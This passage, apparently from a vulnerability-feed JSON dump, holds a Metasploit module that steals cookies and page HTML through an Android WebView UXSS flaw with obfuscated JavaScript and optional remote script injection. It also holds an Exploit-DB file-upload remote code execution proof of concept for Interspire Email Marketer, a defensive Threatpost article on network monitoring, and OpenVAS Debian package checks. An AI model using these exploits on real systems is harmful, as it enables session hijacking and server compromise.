X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"threatpost": [{"lastseen": "2019-05-17T15:47:07", "bulletinFamily": "info", "description": "The number of breaches impacting corporate networks has reached epidemic proportions. This year is currently on track to break all records for breaches. Already this year there have been 1,900 reported breaches in just the past three months, according to [Risk Based Security](<https://www.riskbasedsecurity.com/2019/05/over-1900-breaches-reported-in-the-first-three-months-of-2019-a-new-q1-record/>).\n\nOne of the troubling aspects of today\u2019s breaches is pointed out in [a recent report](<https://www.mcafee.com/enterprise/en-us/assets/reports/restricted/rp-data-exfiltration-2.pdf>) (PDF) that found the most common vector used by hackers to exfiltrate data from a victim was via the company\u2019s own network \u2013 aka network traffic.\n\nThis means that hackers are leveraging the (network) infrastructure itself to steal data. Not good.\n\n**Tracking **\n\nIf cybercriminals can leverage corporate infrastructure for a variety of attacks, then network and operations teams can also use that same infrastructure to effectively fight back. The network itself provides the key.\n\nThreat hunters have to use all their resources at hand, and one of the most valuable is delving deep into the network to gather up all the network metadata that is produced from routers, switches, firewalls, and more. These will provide the first scent of a stealth attack. This pool of data can be analyzed in real-time with network traffic analytics to reflect information related to every conversation on the network and provide a summary of what is taking place at any given moment.\n\nWith this in-depth activity retrieved by network devices, organizations can detect anomalous behavior and spot problems like credential misuse, such as when hackers use credentials stolen in spear phishing campaigns and business email compromise (BEC) attacks. The network actually sees all and is the most powerful resource for forensic investigation. The faster the business can delve into this data, the quicker an attack can be stopped.\n\n**Attacks From The Outside In**\n\nNearly 70 percent of attacks took place from outsiders, and 34 percent involved internal actors according to the \u201c[2019 Data Breach Investigations Report (DBIR)](<https://enterprise.verizon.com/resources/reports/dbir/>).\u201d This is important to understand because while the majority of attacks take place from outsiders, a large percentage still initiates from internal actors.\n\nThe best way to detect when internal actors are starting to veer off the path is by monitoring network behavior to determine when unwanted activities are taking place. Organizations should be looking for behaviors that don\u2019t necessarily break any rules, but are otherwise suspicious. For example, if a user within the sales organization starts accessing data from payroll servers or inventory control systems, there could be a problem.\n\nWhile a simple connection to other parts of the network may seem harmless, it could be a sign of malicious behavior. This doesn\u2019t have to mean that the individual user is making these connections. If their credentials were compromised, a hacker might be attempting to connect to other machines outside the user\u2019s typical connections to determine which devices they can establish a foothold in to steal data.\n\nHere are four things the network sees that could indicate an attack:\n\n * Network users attempting to access system they have never historically accessed before\n * Suspiciously small amounts of traffic going to the same location regularly over a long period of time (this is how the Sony Entertainment breach happened)\n * Irregular DNS queries in large quantities indicate a Domain Generation Algorithm may be in use by malware or ransomware\n * Communication to business-critical servers by IoT devices connected on the corporate network\n\n**The Network as The Source of Knowledge**\n\nWith the network leveraged as the most in-depth source of data, it has the perfect capacity to monitor and collect the data taking place across the network. When user behaviors change, the network sees it. The network can also detect when large amounts of data are being taken in large-scale data exfiltration attacks. But attackers don\u2019t steal terabytes of data all at once; instead, they steal small pieces at a time, and these low-and-slow types of attacks often don\u2019t show up on the radar for most intrusion prevention and detection systems. These systems aren\u2019t looking for small amounts of data leaving the network, and as weeks and months go by, more and more data is slowly smuggled out.\n\nNetwork traffic analytics lets organizations see these types of attacks from inception and alerts businesses to compromise. Additionally, it allows companies and threat hunters alike to leverage the network not only as the heart of the corporate environment, but also as a defensive mechanism as well.\n\n**About the Author**\n\n_Justin Jett is Director of Audit and Compliance at Plixer with roles ranging from system administration of web services to technical product marketing for Plixer\u2019s incident response system, Scrutinizer. Jett, a graduate of the University of Maine at Farmington, is an avid learner of all things security, with a particular interest in TLS and DNS attacks_\n", "modified": "2019-05-17T15:44:37", "published": "2019-05-17T15:44:37", "id": "THREATPOST:72E2113A7CBC86C428C8739C7581061D", "href": "https://threatpost.com/how-decoding-network-traffic-can-save-your-data-bacon/144845/", "type": "threatpost", "title": "How Decoding Network Traffic Can Save Your Data Bacon", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2019-05-17T14:20:11", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-17T00:00:00", "published": "2019-05-17T00:00:00", "id": "EDB-ID:46864", "href": "https://www.exploit-db.com/exploits/46864", "type": "exploitdb", "title": "Interspire Email Marketer\u00a06.20 - 'surveys_submit.php' Remote Code Execution", "sourceData": "# Exploit Title: Interspire Email Marketer\u00a06.20 - Remote Code Execution\r\n# Date: May 2019\r\n# Exploit Author: Numan T\u00fcrle\r\n# Vendor Homepage: https://www.interspire.com\r\n# Software Link: https://www.interspire.com/emailmarketer\r\n# Version: 6.20< \r\n# Tested on: windows\r\n# CVE : CVE-2018-19550\r\n# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813\r\n\r\n\r\nsurveys_submit.php\r\nif (isset($_FILES['widget']['name'])) {\r\n $files = $_FILES['widget']['name'];\r\n\r\n foreach ($files as $widgetId => $widget) {\r\n foreach ($widget as $widgetKey => $fields) {\r\n foreach ($fields as $fieldId => $field) {\r\n // gather file information\r\n $name = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];\r\n $type = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];\r\n $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];\r\n $error = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];\r\n $size = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];\r\n\r\n // if the upload was successful to the temporary folder, move it\r\n if ($error == UPLOAD_ERR_OK) {\r\n $tempdir = TEMP_DIRECTORY;\r\n $upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys';\r\n $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;\r\n $upDir = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();\r\n\r\n // if the base upload directory doesn't exist create it\r\n if (!is_dir($upBaseDir)) {\r\n mkdir($upBaseDir, 0755);\r\n }\r\n\r\n if (!is_dir($upSurveyDir)) {\r\n mkdir($upSurveyDir, 0755);\r\n }\r\n\r\n // if the upload directory doesn't exist create it\r\n if (!is_dir($upDir)) {\r\n mkdir($upDir, 0755);\r\n }\r\n\r\n // upload the file\r\n move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\ninput file name\u00a0: widget[0][field][][value]\r\nsubmit\u00a0: surveys_submit.php?formId=1337\r\n\r\n\r\nPOST /iem/surveys_submit.php?formId=1337 HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2\r\nContent-Length: 340\r\n\r\n------WebKitFormBoundaryF2dckZgrcE306kH2\r\nContent-Disposition: form-data; name=\"widget[0][field][][value]\"; filename=\"info.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\nphpinfo();\r\n?>\r\n------WebKitFormBoundaryF2dckZgrcE306kH2\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryF2dckZgrcE306kH2-\r\n\r\n####\r\n\r\nPOC\r\n\r\n<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <title></title>\r\n</head>\r\n<body>\r\n<form action=\"http://WEBSITE/surveys_submit.php?formId=1337\" method=\"post\" enctype=\"multipart/form-data\">\r\n <input type=\"file\" name=\"widget[0][field][][value]\">\r\n <input type=\"submit\" value=\"submit\" name=\"submit\">\r\n</form>\r\n</body>\r\n</html>\r\n\r\nURL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46864"}], "openvas": [{"lastseen": "2019-05-17T12:22:30", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-17T00:00:00", "published": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310891789", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891789", "title": "Debian LTS Advisory ([SECURITY] [DLA 1789-1] intel-microcode security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891789\");\n script_version(\"2019-05-17T02:00:09+0000\");\n script_cve_id(\"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2019-11091\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 02:00:09 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-17 02:00:09 +0000 (Fri, 17 May 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1789-1] intel-microcode security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00018.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1789-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/929007\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'intel-microcode'\n package(s) announced via the DSA-1789-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update ships updated CPU microcode for most types of Intel CPUs. It\nprovides microcode support to implement mitigations for the MSBDS,\nMFBDS, MLPDS and MDSUM hardware vulnerabilities.\n\nTo fully resolve these vulnerabilities it is also necessary to update\nthe Linux kernel packages. Please refer to DLA-1787-1 for the Linux\nkernel updates required to mitigate these hardware vulnerabilities on\nIntel processors.\");\n\n script_tag(name:\"affected\", value:\"'intel-microcode' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.20190514.1~deb8u1 of the intel-microcode package, and also by the\nLinux kernel package updates described in DLA-1787-1.\n\nWe recommend that you upgrade your intel-microcode packages, and Linux\nkernel packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"intel-microcode\", ver:\"3.20190514.1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310704445", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704445", "title": "Debian Security Advisory DSA 4445-1 (drupal7 - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704445\");\n script_version(\"2019-05-16T02:00:09+0000\");\n script_cve_id(\"CVE-2019-11831\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:09 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:09 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian Security Advisory DSA 4445-1 (drupal7 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4445.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4445-1\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2019-007\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the DSA-4445-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that incomplete validation in a Phar processing\nlibrary embedded in Drupal, a fully-featured content management\nframework, could result in information disclosure.\n\nFor additional information, please refer to the linked upstream advisory.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u9.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u9\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-16T12:22:03", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310891788", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891788", "title": "Debian LTS Advisory ([SECURITY] [DLA 1788-1] samba security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891788\");\n script_version(\"2019-05-16T02:00:18+0000\");\n script_cve_id(\"CVE-2018-16860\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:18 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:18 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1788-1] samba security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00016.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1788-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the DSA-1788-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Isaac Boukris and Andrew Bartlett discovered that the S4U2Self Kerberos\nextension used in Samba's Active Directory support was susceptible to\nman-in-the-middle attacks caused by incomplete checksum validation.\");\n\n script_tag(name:\"affected\", value:\"'samba' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n2:4.2.14+dfsg-0+deb8u13.\n\nWe recommend that you upgrade your samba packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.2.14+dfsg-0+deb8u13\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:10", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310891787", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891787", "title": "Debian LTS Advisory ([SECURITY] [DLA 1787-1] linux-4.9 security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891787\");\n script_version(\"2019-05-16T02:00:21+0000\");\n script_cve_id(\"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2019-11091\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:21 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:21 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1787-1] linux-4.9 security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00017.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1787-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/928125\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-4.9'\n package(s) announced via the DSA-1787-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple researchers have discovered vulnerabilities in the way the\nIntel processor designs have implemented speculative forwarding of data\nfilled into temporary microarchitectural structures (buffers). This\nflaw could allow an attacker controlling an unprivileged process to\nread sensitive information, including from the kernel and all other\nprocesses running on the system or cross guest/host boundaries to read\nhost memory.\n\nSee the references for more details.\n\nTo fully resolve these vulnerabilities it is also necessary to install\nupdated CPU microcode. An updated intel-microcode package (only\navailable in Debian non-free) will be provided via a separate DLA. The\nupdated CPU microcode may also be available as part of a system firmware\n('BIOS') update.\n\nIn addition, this update includes a fix for a regression causing\ndeadlocks inside the loopback driver, which was introduced by the update\nto 4.9.168 in the last security update.\");\n\n script_tag(name:\"affected\", value:\"'linux-4.9' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n4.9.168-1+deb9u2~deb8u1.\n\nWe recommend that you upgrade your linux-4.9 packages.\");\n\n script_tag(name:\"solution_type\", 